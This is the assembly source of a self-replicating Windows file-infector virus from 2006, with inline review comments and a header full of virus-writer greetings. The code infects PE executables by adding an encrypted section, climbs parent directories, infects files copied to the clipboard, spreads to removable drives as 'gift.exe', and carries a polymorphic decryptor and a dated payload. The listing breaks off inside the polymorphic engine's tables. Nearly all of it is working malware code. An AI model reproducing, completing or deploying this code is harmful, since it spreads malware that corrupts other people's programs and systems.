;lust 1.4 [LoveHoaxer]
;
;coded by : fakedminded 2006 [a current EOF-project member]
;Method : the virus adds a new section to PE exe files; installers (files with a large overlay after the last section) and a few other exe layouts will not be infected.
; The virus walks the directory tree upward five levels, infecting any
; victim file on the way. It then tries to create a mutex for the clipboard sniffer (which infects directories and executables found on the clipboard);
; if that mutex already exists it tries to create another mutex for the removable-disk dropper, and if that one exists too it just sleeps.
; It has a simple polymorphic engine for its decryptor, and a multi-encryption
; key is created for each offspring! It will run the old host as a new thread.
;Payload : On 13/1 of every year it will create a number of files containing a certain poem
; and it will display that poem.
;SIZE : ~4043 bytes
;Greetings: EOF-project members a big non-gay hug to all of you :))
; Vxers from all round the world keep the ancients heritage and dont spoil everything !
; Avers -none greetings for you ...
; M$ keep the good work on making exploited OSes ...nice guys making hackers world --plain
; My real life friends ,hoping to have nice life..(especially _mh) ah yeah..viscosity,Mr.Bean,Maryoosh,ahk..all of you guys :lol:
; My l(o/u)st love you dont know me ,,but I created this shit for you..bitch :D
;-----------------------------------------
;NOTE : in order to assemble it :
;-----------------------------------------
;@echo off
;\masm32\bin\ml /c /coff /Cp lovehoaxer.asm
;\masm32\bin\link /filealign:0x200 /section:.text,RWX /subsystem:windows /libpath:\masm32\lib lovehoaxer.obj
;pause
;PEWRSEC.COM lovehoaxer.exe
;pause
;-----------------------------------------
;
;nop it all----------------------------90h
;
.386
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
vir_size=offset end__ -offset start ; total length in bytes of the virus body (start..end__); copied and written as one unit by adding_section
_sub =offset _enc-offset start ; length of the plaintext decryptor stub; everything from _enc onward is XOR-encrypted in offspring
.data
db "LoveHoaxer 1.4",0 ; marker string in .data only; not part of the copied body (start..end__ lives in .code)
.code
start: ; entry of the virus body. Layout: plaintext stub (start.._enc) followed by the encrypted remainder (_enc..end__)
call daemon ; pushes the runtime address of `daemon`
daemon:
pop eax ; eax = runtime address of daemon
xchg eax,eax
mov ebp,eax
sub ebp,offset daemon ; ebp = delta between link-time and runtime addresses; every global below is addressed as [ebp+offset x]
cmp ebp,0
je _enc ; delta 0 = running as the original build, which is stored unencrypted: skip the decryptor
mov esi,offset _enc
add esi,ebp ; esi -> first encrypted byte (runtime address)
xor ecx,ecx ; ecx = bytes decrypted so far
jmp pass1
decrypt_str dd 1234 ; XOR key. NOTE(review): nothing in this listing writes decrypt_str, so the key stays 1234 in every offspring despite the "new key per offspring" claim in the header
pass1:
xor eax,eax
mov eax,[ebp+offset decrypt_str] ; eax = key
decrypt_size = offset __enc - offset decrypt ; size of the rewritable decryptor window (14 bytes of code + 40 NOPs); not referenced elsewhere in this listing
decrypt: ; decrypt loop. poly_ overwrites this window in memory with equivalent instruction sequences (part_1..part_4) before each infection
xor dword ptr [esi],eax ; part_1 role: [esi] ^= key
add esi,4 ; part_2 role: esi += 4
add ecx,4 ; part_3 role: ecx += 4
cmp ecx,vir_size- _sub ; part_4 role: compare against the encrypted length; the flags survive the NOPs below
db 40 dup(90h) ;buffer zone: slack so that longer poly variants fit; NOPs preserve the flags
__enc:
jnae decrypt ; unsigned: loop while ecx < vir_size-_sub
_enc: ; start of the XOR-encrypted region in offspring (everything from here to end__)
jmp code_start
victim_file db "me3za.exe",0 ;just for testing! (only used by the commented-out test_ stub)
curr_entry dd 0 ; host's original entry RVA, copied from prev_entry at startup; 0 in the original build
image_curr dd 0 ; host's preferred ImageBase, copied from image_base at startup
image_base dd 0 ; written by adding_section from the victim's header; lives in the copied body, so the offspring carries its host's value
prev_entry dd 0 ; written by adding_section (victim's original AddressOfEntryPoint); likewise carried into the offspring
win32_fdata dd 0 ; heap buffer for the WIN32_FIND_DATA used by folder_infector
find_handle dd 0 ; FindFirstFile/FindNextFile handle
buffer dd 0 ; 512-byte heap scratch buffer allocated in payload_; also used by drop_flash for the destination path
tid dd 0 ; thread id out-param for CreateThread
hThread dd 0 ; handle of the thread that runs the host's original entry point
exitCode dd 0 ; not referenced in this listing
current_dir dd 0 ; 512-byte buffer holding the directory to return to after the upward walk
buffer_clpboard dd 0 ; 512-byte buffer for one clipboard path
h_drop dd 0 ; HDROP taken from the clipboard
clp_mutex db "clp_board~11_!",0 ; mutex name: "clipboard sniffer already running" flag
dropper_mutex db "flash_~1@",0 ; mutex name: "removable-drive dropper already running" flag
extension db "*.exe",0 ; search pattern for folder_infector
dotdot db "..",0 ; parent directory, used for the upward walk
dateformat db "d M y",0 ; GetDateFormatA picture: day, month, 2-digit year, space-separated, no leading zeros
szPayload db "To the whom I loved",13,10,"To the whom I needed",13,10,"You were the only fotune I ever pleaded",13,10
db "You didnt notice I couldnt fake it",13,10
db "Hba you have the womb I liked to seed it :D",13,10,"with love /berniee",13,10,0 ; payload text (spelling is part of the original data and left as-is)
string_ db "abcdefgh",0 ; alphabet for the random payload file names (rnd_ yields 0..5, so only a..f are ever used)
ext__ db ".txt",0 ; extension of the payload files
counter_ db 0 ; upward-walk counter. Lives inside the copied body, so an offspring inherits the parent's value at infection time and climbs fewer levels
ebp_ dd 0 ; not referenced in this listing
code_start: ; main flow. Convention throughout: ebp = runtime delta (see start); all globals are [ebp+offset x]
call get_kernel ; locate kernel32's base by scanning down from the loader's return address. NOTE: runs before the SEH frame below exists, so a fault in the scan is unhandled
assume fs:nothing ;install SEH
mov eax,offset handle_err ;Handle Error Exceptions in lame way!
add eax,ebp
push eax ; handler address
push fs:[0] ; previous EXCEPTION_REGISTRATION
mov fs:[0],esp ; fs:[0] -> {prev, handler}; never unlinked again on the normal path (see exit)
call find_main_api ; resolve GetProcAddress by walking kernel32's export table
call find_other_apis ; resolve every other import by name via GetProcAddress/LoadLibraryA
call [ebp+offset AIsDebuggerPresentF] ;thanx to WarGame for reminding of this function :)
or eax,eax
jnz exit ; bail out silently when a debugger is attached
call payload_ ; date-triggered payload; it also allocates `buffer` unconditionally, which drop_flash relies on later
mov eax, dword ptr [ebp+offset image_base] ; image_base/prev_entry hold this host's values, embedded by the parent at infection time
mov dword ptr [ebp+offset image_curr],eax
mov eax, dword ptr [ebp+offset prev_entry]
mov dword ptr [ebp+offset curr_entry],eax ; keep them aside before adding_section overwrites the originals with the next victim's values
;jmp test_
push 512
push 0
call [ebp+offset AGlobalAllocF] ; GlobalAlloc(GMEM_FIXED, 512); result not checked, never freed
mov [ebp+offset current_dir],eax
push [ebp+offset current_dir]
push 512
call [ebp+offset AGetCurrentDirectoryF] ; remember where the host started
push sizeof WIN32_FIND_DATA
push 0
call [ebp+offset AGlobalAllocF]
or eax,eax
jz exit;abort_
mov [ebp+offset win32_fdata],eax
doit_again: ; infect *.exe in the current directory, then cd ".." -- five iterations in total (fewer when counter_ was inherited non-zero)
call folder_infector
mov esi, [ebp+offset win32_fdata]
mov ecx, sizeof WIN32_FIND_DATA
zer0_it: ; clear the find buffer between directories
mov byte ptr [esi],0
inc esi
loop zer0_it
mov eax,offset dotdot
add eax,ebp
push eax
call dword ptr [ebp+offset ASetCurrentDirectoryF] ; cd ..; result not checked
inc byte ptr [ebp+offset counter_]
cmp byte ptr [ebp+offset counter_],5 ;times upward
jne doit_again
push [ebp+offset current_dir]
call [ebp+offset ASetCurrentDirectoryF] ; restore the original working directory for the host
cmp dword ptr [ebp+offset curr_entry],0
je exit ; original build (no host to run): leave
mov eax,dword ptr [ebp+offset curr_entry]
add eax,dword ptr [ebp+offset image_curr] ; eax = ImageBase + original EntryPoint. NOTE: this is the header ImageBase, not the actual load address -- a relocated host would be mis-targeted
mov ebx,offset tid
add ebx,ebp
push ebx ; lpThreadId
push 0 ; dwCreationFlags
push 0 ; lpParameter
push eax ; lpStartAddress = host's original entry point
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call [ebp+offset ACreateThreadF] ; run the original host as a second thread while this thread stays resident below
or eax,eax
jz exit
mov [ebp+offset hThread],eax
mov eax,offset clp_mutex
add eax,ebp
push eax ; lpName
push TRUE ; bInitialOwner
push 0 ; lpMutexAttributes
call [ebp+offset ACreateMutexF] ; CreateMutexA(NULL, TRUE, "clp_board~11_!"): first running instance claims the clipboard-sniffer role
call [ebp+offset AGetLastErrorF]
cmp eax,ERROR_ALREADY_EXISTS
je see_drop
call capture_clpboard ; never returns: capture_clpboard loops forever
see_drop:
mov eax,offset dropper_mutex
add eax,ebp
push eax
push TRUE
push 0
call [ebp+offset ACreateMutexF] ; second instance claims the removable-drive dropper role
call [ebp+offset AGetLastErrorF]
cmp eax,ERROR_ALREADY_EXISTS
je loop_nothing
call drop_flash ; never returns: drop_flash loops forever
loop_nothing: ; any further instance: idle forever in 3 s sleeps so the host thread keeps running
push 3000
call [ebp+offset ASleepF]
jmp loop_nothing
;test_:
;pusha
;mov edx,offset victim_file
;add edx,ebp
;call adding_section
;popa
exit: ; leave the virus. Assumes esp still points at the SEH record pushed above: pops it (without restoring fs:[0]) and returns to the address the loader called our entry point from
pop edx
pop eax
ret ; NOTE: `exit` is also reached by `jz`/`jne exit` from inside nested calls (l00p_apis, find_other_apis, find_main_api); there the two pops do not match the SEH record and the ret target is whatever happens to lie on the stack
handle_err: ; SEH handler. Stack on entry: ret, EXCEPTION_RECORD*, establisher frame, CONTEXT*, dispatcher context
mov eax,[esp+12] ;eax ptr to CONTEXT structure
mov esp,[eax+184+12] ;regEsp -- CONTEXT.Esp (offset 0C4h): switch to the faulting thread's stack pointer
pop fs:[0] ; assumes esp now points at the record pushed in code_start; that only holds for a fault raised with the same esp as right after the SEH install, not from inside nested calls
pop eax
ret ;just do nothing in case of errors! -- returns to whatever return address sits above the record (the loader's, in the assumed case); no ExceptionContinue* disposition is ever returned
folder_infector: ; infect every *.exe in the current directory (file names are relative, so the cwd is the target). Clobbers eax/edx; callers' pusha/popa cover adding_section
push [ebp+offset win32_fdata]
mov eax,offset extension
add eax,ebp
push eax
call [ebp+offset AFindFirstFileF] ; FindFirstFileA("*.exe", win32_fdata)
cmp eax,INVALID_HANDLE_VALUE
je no_more_files ;abort_ -- NOTE: still calls FindClose on the stale find_handle from the previous directory (or 0)
mov [ebp+offset find_handle],eax
mov edx,dword ptr [ebp+offset win32_fdata]
add edx,WIN32_FIND_DATA-274 ; edx -> cFileName: the type name evaluates to its size (318), 318-274 = 44 = offset of cFileName
pusha
call adding_section ; edx = relative file name of the first match
popa
searching__:
push [ebp+offset win32_fdata]
push [ebp+offset find_handle]
call dword ptr [ebp+offset AFindNextFileF]
call [ebp+AGetLastErrorF] ; [ebp+AGetLastErrorF] is the same displacement as [ebp+offset AGetLastErrorF]
cmp eax,ERROR_NO_MORE_FILES
je no_more_files ; NOTE: only GetLastError is consulted, the FindNextFile return value is ignored; any other failure presumably loops on the stale buffer contents
mov edx,dword ptr [ebp+offset win32_fdata]
add edx,WIN32_FIND_DATA-274 ; edx -> cFileName again
pusha
call adding_section
popa
jmp searching__
no_more_files:
push [ebp+offset find_handle]
call [ebp+offset AFindCloseF]
ret
;/////////////////////adding new section at the end of file
;///////////////////
adding_section: ;file infection procedure by adding new section
; In:  edx -> NUL-terminated path of the candidate file (relative or absolute)
; Out: none. On success the file has a new ".hba" section holding the re-encrypted body, AddressOfEntryPoint pointing at it, and NumberOfSections/SizeOfImage/SizeOfCode patched
; Side effects: rewrites image_base/prev_entry in this instance's own body (so the offspring knows its host); v_mem and vir_enc_mem are GlobalAlloc'd and never freed
; Clobbers: everything -- callers wrap the call in pusha/popa
jmp code_
v_handle dd 0 ; CreateFile handle of the victim
v_size dd 0 ; victim file size
v_mem dd 0 ; heap copy of the whole victim file
sec_align dd 0 ; victim SectionAlignment
file_align dd 0 ; victim FileAlignment
add_ed dd 0 ; RVA of the new section (becomes the new entry point)
bwr dd 0 ; bytes-transferred out-param for ReadFile/WriteFile
cur_pe dd 0 ; -> first section header in v_mem
v_size_aligned dd 0 ; not referenced in this listing
virtual_address dd 0 ; RVA for the new section: end of the last section rounded up to SectionAlignment
physical_address dd 0 ; file offset for the new section: end of the last section's raw data rounded up to FileAlignment
vir_enc_mem dd 0 ; heap copy of the body used to build the encrypted offspring
code_:
push edx ; extra copy of the path; popped right after the Sfc check on the success path only
push edx ; ProtFileName
push 0 ; RpcHandle
call dword ptr [ebp+offset ASfcIsFileProtectedF] ; skip files under Windows File Protection. NOTE(review): SfcIsFileProtected takes a wide-char path but an ANSI string is passed, so the check presumably never fires
or eax,eax
jnz err_sec ; NOTE: the extra `push edx` above is still on the stack here, so err_sec's `ret` would pop the path pointer as its return address
pop edx
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 3 ; OPEN_EXISTING
push 0 ; lpSecurityAttributes
push FILE_SHARE_READ or FILE_SHARE_WRITE
push 40000000h or 80000000h ; GENERIC_WRITE or GENERIC_READ
mov eax,edx
push eax
call dword ptr [ebp+offset ACreateFileF] ; handle not validated; on INVALID_HANDLE_VALUE GetFileSize returns -1 and the GlobalAlloc below fails
mov dword ptr [ebp+offset v_handle],eax
push 0
push dword ptr [ebp+offset v_handle]
call dword ptr [ebp+offset AGetFileSizeF]
mov dword ptr [ebp+offset v_size],eax
push dword ptr [ebp+offset v_size]
push 0
call dword ptr [ebp+offset AGlobalAllocF] ; GlobalAlloc(GMEM_FIXED, v_size) -- never freed
or eax,eax
jz err_sec
mov dword ptr [ebp+offset v_mem],eax
push 0
mov eax,offset bwr
add eax,ebp
push eax
push dword ptr [ebp+offset v_size]
push dword ptr [ebp+offset v_mem]
push dword ptr [ebp+offset v_handle]
call dword ptr [ebp+offset AReadFileF] ;--->completed reading the file to the v_mem
mov edx,dword ptr [ebp+offset v_mem]
cmp word ptr [edx],'ZM' ; "MZ"
jne err_sec
add edx,dword ptr [edx+3ch] ;---->edx = PE header (e_lfanew is not bounds-checked against v_size)
cmp word ptr [edx],'EP' ; "PE"
jne err_sec
mov eax, dword ptr [edx+52] ; OptionalHeader.ImageBase
mov dword ptr [ebp+offset image_base],eax ;---->stored into our own body so the offspring can start its host
mov eax, dword ptr [edx+40] ; OptionalHeader.AddressOfEntryPoint
mov dword ptr [ebp+offset prev_entry],eax ;---->same for the original entry point
xor ecx,ecx
mov cx,word ptr [edx+6h] ; cx = old NumberOfSections
inc word ptr [edx+6h] ;sec. numbers=old+1(our new section) -- applied to the heap copy; only reaches disk on the success path
mov eax,dword ptr [edx+60] ; FileAlignment
mov [ebp+offset file_align],eax
mov eax,dword ptr [edx+56] ;-->SectionAlignment (usually 1000h)
mov [ebp+offset sec_align],eax
mov ebx,eax
mov eax,vir_size ;---->SizeOfImage += round_up(vir_size, SectionAlignment)
call align__
add dword ptr [edx+80],eax
push edx ; save the PE header pointer (popped after the section-table work)
xor eax,eax
mov ax,word ptr [edx+14h] ;--->SizeOfOptionalHeader
add ax,24 ;--->+24 (PE signature + file header) = offset of the section table
add edx,eax
mov dword ptr [ebp+offset cur_pe],edx ;saving the first section header
xor eax,eax
xor edx,edx
mov eax,28h ;--->28h = IMAGE_SECTION_HEADER size; 16-bit multiply ax*cx -> dx:ax
mul cx
mov edx,[ebp+offset cur_pe]
add edx,eax
sub edx,28h ;edx -> last existing section header
mov eax,dword ptr [edx+0ch] ;--->VirtualAddress of previous section
add eax,dword ptr [edx+08h] ;--->+ VirtualSize of previous section
mov ebx,[ebp+offset sec_align] ;--->round up to SectionAlignment
call align__
mov dword ptr [ebp+offset virtual_address],eax ;--->RVA of the new section
mov eax,dword ptr[edx+20] ;----->PointerToRawData of prev. section
add eax,dword ptr[edx+16] ;----->+ SizeOfRawData of prev. section
mov ebx,[ebp+offset file_align] ;--->round up to FileAlignment
call align__
mov dword ptr [ebp+offset physical_address],eax
continue__:
add edx,28h ;--->edx -> the slot for our header (right after the last one)
mov ecx,28h
loop_grant: ;--->require the slot to be all zero (a dword compare at each of 40 byte positions, i.e. 43 bytes). Not checked against SizeOfHeaders; presumably relies on the usual header padding
cmp dword ptr [edx],0 ;--alot of ecxeptions
jne err_all
inc edx
loop loop_grant
sub edx,50h ; edx -> last existing section header again
cmp dword ptr [edx],'abh.' ; its name is ".hba": already infected
je err_all
add edx,28h ; back to the free slot
mov dword ptr [edx],'abh.' ;------>Name = ".hba" (infection marker)
mov eax,vir_size
mov ebx,[ebp+offset file_align] ;---->VirtualSize = round_up(vir_size, FileAlignment) (note: file, not section, alignment)
call align__
mov dword ptr [edx+8],eax ;-------> Misc.VirtualSize
push dword ptr [ebp+offset virtual_address] ;-----> VirtualAddress
pop dword ptr [edx+12]
mov eax,[edx+12]
mov dword ptr [ebp+offset add_ed],eax
mov dword ptr [edx+16],vir_size ;----->SizeOfRawData = exact body length, not rounded to FileAlignment
push dword ptr [ebp+offset physical_address] ;---->PointerToRawData
pop dword ptr [edx+20]
mov dword ptr [edx+36],0c0000040h ;Characteristics = MEM_READ|MEM_WRITE|CNT_INITIALIZED_DATA. NOTE: no IMAGE_SCN_MEM_EXECUTE (20000000h) although the entry point lands here; on a DEP/NX-enforced process that faults
pop edx ;--edx = PE header again
mov eax,dword ptr [ebp+offset physical_address] ;now after the popping,
;checking if there is some extra in the end
add eax,10000 ;let go some situation ;) -- tolerate up to 10000 bytes of overlay after the last section; larger overlays (installers, self-extractors) are skipped, see the header note
cmp [ebp+offset v_size],eax
jg err_sec ; signed compare
mov eax,[ebp+offset add_ed] ;----> RVA of our new section
mov dword ptr [edx+28h],eax ;---->AddressOfEntryPoint = new section (the body later spawns the old entry point as a thread)
mov eax,[edx+80]
mov [edx+01ch],eax ; SizeOfCode = SizeOfImage (as written; purpose not evident from this listing)
push FILE_BEGIN
push 0
push 0
push dword ptr [ebp+offset v_handle]
call dword ptr [ebp+offset ASetFilePointerF] ; rewind
push 0
mov eax,offset bwr
add eax,ebp
push eax
push dword ptr [ebp+offset v_size]
push dword ptr [ebp+offset v_mem]
push dword ptr [ebp+offset v_handle]
call dword ptr [ebp+offset AWriteFileF] ; write the whole file back with the patched headers
push FILE_BEGIN
push 0
push dword ptr [ebp+offset physical_address]
push dword ptr [ebp+offset v_handle]
call dword ptr [ebp+offset ASetFilePointerF] ; seek to the new section's raw data (this overwrites any small overlay that was there)
call poly_ ;polymorphic procedure: rewrites this instance's in-memory decryptor window before the body is copied
push vir_size
push 0
call dword ptr [ebp+offset AGlobalAllocF] ; result not checked; never freed
mov dword ptr [ebp+offset vir_enc_mem],eax
mov edi,dword ptr [ebp+offset vir_enc_mem]
mov esi,offset start
add esi,ebp
mov ecx,vir_size
rep movsb ; snapshot the live (decrypted, poly-patched) body, including current variable values such as image_base, prev_entry, counter_ and the resolved API table
mov edi,dword ptr [ebp+offset vir_enc_mem]
add edi,_sub ; skip the plaintext decryptor stub
mov eax,[ebp+offset decrypt_str] ; XOR key (constant, see decrypt_str)
loop_encrypt: ; ecx is 0 here (left by rep movsb); mirror image of the decrypt loop
xor dword ptr [edi],eax
add edi,4
add ecx,4
cmp ecx,vir_size- _sub
jnae loop_encrypt
push 0
mov eax,offset bwr
add eax,ebp
push eax
push vir_size
;mov eax,offset start
;add eax,ebp
push dword ptr [ebp+offset vir_enc_mem]
push dword ptr [ebp+offset v_handle]
call dword ptr [ebp+offset AWriteFileF] ;----> write our virus to the end of file
push dword ptr [ebp+offset v_handle]
call dword ptr [ebp+offset ACloseHandleF]
ret
err_sec: ; bail out before the PE header pointer was pushed (or after it was popped)
push dword ptr [ebp+offset v_handle]
call dword ptr [ebp+offset ACloseHandleF]
ret
err_all: ; bail out with the PE header pointer still pushed: discard it before returning
push dword ptr [ebp+offset v_handle]
call dword ptr [ebp+offset ACloseHandleF]
pop edx
ret
align__: ; eax = round_up(eax, ebx). ebx must be non-zero (a zero alignment field in a malformed header raises #DE, caught by the SEH handler). Preserves edx; clobbers flags
push edx
xor edx, edx
div ebx ; eax = quotient, edx = remainder
or edx, edx
JZ no_round_up
inc eax ; remainder present: one more unit
no_round_up:
mul ebx ; eax = quotient*ebx (edx clobbered, restored below)
pop edx
ret
;///////////Clip Board sniffer
;////////////
capture_clpboard: ;poll the clipboard for CF_HDROP (copied files/folders) every 5 s and infect what it finds; never returns
push 512
push 0
call [ebp+offset AGlobalAllocF] ; path buffer, never freed
mov dword ptr [ebp+offset buffer_clpboard],eax
_label1:
push 0
call [ebp+offset AOpenClipboardF] ; OpenClipboard(NULL); failure is not checked (GetClipboardData then just returns 0)
push CF_HDROP
call [ebp+offset AGetClipboardDataF]
or eax,eax
jz _sleepClp
mov [ebp+offset h_drop],eax
push 0 ; cch
push 0 ; lpszFile = NULL
push 0FFFFFFFFh ; iFile = -1: ask for the file count
push eax
call [ebp+offset ADragQueryFileF]
or eax,eax
jz _sleepClp
mov ecx,eax ; ecx = number of dropped paths; walked from the last to the first
_getFiles:
push ecx
push 512 ; cch
push [ebp+offset buffer_clpboard] ; lpszFile
dec ecx
push ecx ; iFile = ecx-1
push [ebp+offset h_drop]
call [ebp+offset ADragQueryFileF] ; fetch one path (no .exe filter here -- adding_section's MZ/PE checks do the rejecting)
push [ebp+offset buffer_clpboard]
call [ebp+offset AGetFileAttributesF]
cmp eax,FILE_ATTRIBUTE_READONLY ; whole-value compare, not a bit test: only an entry whose attributes are exactly READONLY is skipped; INVALID_FILE_ATTRIBUTES is not handled
je see_next
cmp eax,FILE_ATTRIBUTE_DIRECTORY ; likewise: a directory with any extra attribute bit is treated as a file (CreateFile then fails and adding_section bails out)
jne see_normal_file
push [ebp+offset current_dir]
push 512
call [ebp+offset AGetCurrentDirectoryF] ; remember cwd, enter the dropped folder, infect it, return
push [ebp+offset buffer_clpboard]
call [ebp+offset ASetCurrentDirectoryF]
call folder_infector
push [ebp+offset current_dir]
call [ebp+offset ASetCurrentDirectoryF]
jmp see_next
see_normal_file:
mov edx,[ebp+offset buffer_clpboard]
pusha
call adding_section
popa
see_next:
pop ecx
loop _getFiles
_sleepClp:
call [ebp+ACloseClipboardF] ; same displacement as [ebp+offset ACloseClipboardF]
mov esi,[ebp+offset buffer_clpboard]
mov ecx,512
call zero_it
push 5000
call [ebp+offset ASleepF]
jmp _label1 ; loop forever
exit_clpboard: ; unreachable
ret
payload_: ;ugly payload dont bother -- date-triggered: writes the poem into four randomly named .txt files in the cwd and shows it in a MessageBox
push 512
push 0
call [ebp+offset AGlobalAllocF] ; `buffer` is allocated here unconditionally (before the date check) and reused by drop_flash later
or eax,eax
jz exit_payload
mov [ebp+offset buffer],eax
push 512 ; cchDate
push [ebp+offset buffer] ; lpDateStr
mov eax,offset dateformat
add eax,ebp
push eax ; lpFormat = "d M y"
push 0 ; lpDate = NULL (today)
push 0 ; dwFlags
push 0 ; Locale
call [ebp+offset AGetDateFormatF] ; e.g. 13 January 2006 -> "13 1 06"
mov eax,[ebp+offset buffer]
cmp word ptr [eax],"131" ; NOTE(review): a 3-character constant does not fit a 16-bit operand. If the assembler keeps only the low word ("13"), this matches the 13th of *any* month, not just 13/1 as the header says -- verify with the assembler actually used
jne exit_payload
xor eax,eax ; eax = file counter 0..3
_crap:
push eax
mov ebx,-1 ; ebx = character index
_stringer:
inc ebx
push ebx
push 73
call [ebp+offset ASleepF] ; short sleep so GetTickCount (used by rnd_) moves between characters
call rnd_ ; eax = 0..5
mov edx,offset string_
add edx,ebp
add edx,eax ; -> one of "abcdef"
mov esi,edx
mov edi,[ebp+offset buffer]
pop ebx
add edi,ebx
mov ecx,1
rep movsb ; buffer[ebx] = random letter
cmp ebx,10
jne _stringer ; 11 letters (indices 0..10)
mov esi,offset ext__
add esi,ebp
mov ecx,4
rep movsb ; append ".txt" -- only 4 bytes, so no terminator is written; the name relies on whatever already follows in the buffer (GlobalAlloc(0,..) does not zero it)
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 2 ; CREATE_ALWAYS
push 0 ; lpSecurityAttributes
push 0 ; dwShareMode
push 40000000h ; GENERIC_WRITE
push [ebp+offset buffer]
call [ebp+offset ACreateFileF] ; handle not validated
mov edx,eax
push edx
push 0
mov eax,offset bwr
add eax,ebp
push eax
push 177 ; byte count. NOTE: shorter than szPayload (185 bytes by count, excluding the NUL), so the written copy is cut off before the end
mov eax,offset szPayload
add eax,ebp
push eax
push edx
call [ebp+offset AWriteFileF]
pop edx
push edx
call [ebp+offset ACloseHandleF]
pop eax
inc eax
cmp eax,4
jne _crap ; four files
push 0 ; uType
push [ebp+offset buffer] ; caption = last generated file name
mov eax,offset szPayload
add eax,ebp
push eax ; text = the poem
push 0 ; hWnd
call dword ptr [ebp+offset AMessageBoxF]
exit_payload:
ret
;///////////file dropper
;////////
drop_flash: ;copy the running host executable (this infected program, located via GetModuleFileName) to every removable drive except A: as "gift.exe", repeating every 5 s forever. Only the file is dropped; no autorun entry is written here
jmp @@1
buffer_dropper dd 0 ; 512-byte buffer for GetLogicalDriveStrings ("C:\" NUL "D:\" NUL ... NUL)
module_name dd 0 ; 512-byte buffer holding the running module's path
file_name db "gift.exe",0 ; name dropped onto the removable drive
@@1:
push 512
push 0
call [ebp+offset AGlobalAllocF]
mov [ebp+offset buffer_dropper],eax
push 512
push 0
call [ebp+offset AGlobalAllocF]
mov [ebp+offset module_name],eax
push 512
push eax
push 0
call [ebp+offset AGetModuleFileNameF] ; GetModuleFileNameA(NULL, module_name, 512) = path of the host exe
search_driver:
push [ebp+offset buffer_dropper]
push 512
call [ebp+offset AGetLogicalDriveStringsF] ; GetLogicalDriveStringsA(512, buffer_dropper)
mov edx,[ebp+offset buffer_dropper]
_rumble: ; edx -> current root string ("X:\")
push edx
cmp byte ptr [edx],"A"
je seek_nother ; skip A: (floppy) by letter only; B: is not excluded
push edx
call [ebp+offset AGetDriveTypeF]
cmp eax,DRIVE_REMOVABLE
jne seek_nother
mov esi,[ebp+offset buffer] ; `buffer` was allocated by payload_; reused here as the destination path
mov ecx,256
call zero_it
pop edx
push edx
mov esi,edx
mov edi,[ebp+offset buffer]
mov ecx,3
rep movsb ; "X:\"
mov edi,[ebp+offset buffer]
add edi,3
mov esi,offset file_name
add esi,ebp
mov ecx,8
rep movsb ; + "gift.exe" (the terminator comes from the zeroing above)
push FALSE ; bFailIfExists = FALSE: an existing gift.exe is overwritten
push [ebp+offset buffer]
push [ebp+offset module_name]
call [ebp+offset ACopyFileF] ; CopyFileA(module_name, "X:\gift.exe", FALSE); result not checked
seek_nother:
pop edx
add edx,4 ; next 4-byte root entry
cmp byte ptr [edx+1],0 ; the list ends with an empty entry (double NUL)
je sleep_baby
jmp _rumble
sleep_baby:
push 5000
call [ebp+offset ASleepF]
mov esi,[ebp+offset buffer_dropper]
mov ecx,512
call zero_it
jmp search_driver ; loop forever
ret ; unreachable
zero_it: ; memset(esi, 0, ecx). ecx must be > 0 (`loop` with ecx=0 would run 4G iterations). Out: esi advanced past the block, ecx = 0
mov byte ptr[esi],0
inc esi
loop zero_it
ret
counter_poly dd 0 ; total bytes emitted by poly_ so far; accumulated but never read
poly_: ;poly engine a pre-historic one: rebuilds this instance's decrypt window in memory by picking one of six equivalent sequences for each of the four decryptor instructions, then NOPs the 10 bytes that follow. Needs writable code (RWX .text in the original build, R/W .hba section in hosts). Clobbers eax,ebx,ecx,edx,esi,edi
call rnd_
inc eax ; pick entry 1..6
mov esi,offset part_1
add esi,ebp
xor ecx,ecx
call seek_another ; edi -> chosen part_1 variant, ebx = its length
mov esi,edi
mov edi,offset decrypt
add edi,ebp ; edi -> decrypt window (runtime address)
add [ebp+offset counter_poly],ebx
mov ecx,ebx
rep movsb ; emit the "[esi] ^= key" variant
push edi
call rnd_
inc eax
mov esi,offset part_2
add esi,ebp
xor ecx,ecx
call seek_another
mov esi,edi
pop edi
add [ebp+offset counter_poly],ebx
mov ecx,ebx
rep movsb ; emit the "esi += 4" variant
push edi
call rnd_
inc eax
mov esi,offset part_3
add esi,ebp
xor ecx,ecx
call seek_another
mov esi,edi
pop edi
add [ebp+offset counter_poly],ebx
mov ecx,ebx
rep movsb ; emit the "ecx += 4" variant
push edi
call rnd_
inc eax
mov esi,offset part_4
add esi,ebp
xor ecx,ecx
call seek_another
mov esi,edi
pop edi
add [ebp+offset counter_poly],ebx
mov ecx,ebx
rep movsb ; emit the "cmp ecx, length" variant (sets the flags consumed by jnae at __enc)
mov ecx,10 ;better than this could be done -- only the 10 bytes after the new sequence are re-NOPed; bytes beyond that keep whatever was there before (NOPs from the original build, or the tail of a longer sequence written by an earlier poly_ run in this process), which may leave stray opcodes in the offspring's window
call nop_it
ret
seek_another: ; select the eax-th (1-based, counting from ecx) 0FFh-terminated entry starting at esi
; Out: edi -> entry start, ebx = entry length (bytes before its 0FFh), esi -> byte after the terminator, ecx = eax
; Entries must not contain an 0FFh byte themselves (the 32-bit immediates in part_4 are assumed to be free of it)
xor ebx,ebx
mov edi,esi
seek_opcode:
inc ebx
inc esi
cmp byte ptr [esi],0ffh
jne seek_opcode
inc esi ; step over the terminator
inc ecx
cmp ecx,eax
jne seek_another
ret
nop_it: ; fill ecx bytes at edi with NOP (90h); ecx must be > 0. Out: edi advanced, ecx = 0
mov byte ptr[edi],90h
inc edi
loop nop_it
ret
rnd_: ;rnd will get 6-random range number: eax = (GetTickCount()+666h) mod 6, i.e. 0..5. Clobbers ecx, edx, flags
call [ebp+offset AGetTickCountF]
add eax,666h
loop_4:
xor edx,edx
mov ecx,6
div ecx ; edx = remainder
xchg edx,eax ; eax = remainder (0..5), edx = quotient
cmp eax,6
ja loop_4 ; never taken: a remainder of 6 or more cannot occur
cmp eax,0
ja @continue_
mov ecx,1 ; dead store: only ecx changes, the 0 in eax is returned as-is
@continue_:
ret
poly_data: ;---the other opcodes to be replaced by the old opcodes in the decryptor
; Four tables, one per decryptor instruction; each holds six 0FFh-terminated variants with the same net effect on esi/ecx/[esi] and the flags (ebx/edx are free scratch registers)
part_1: ; [esi] ^= eax
push eax
mov eax,eax
pop eax
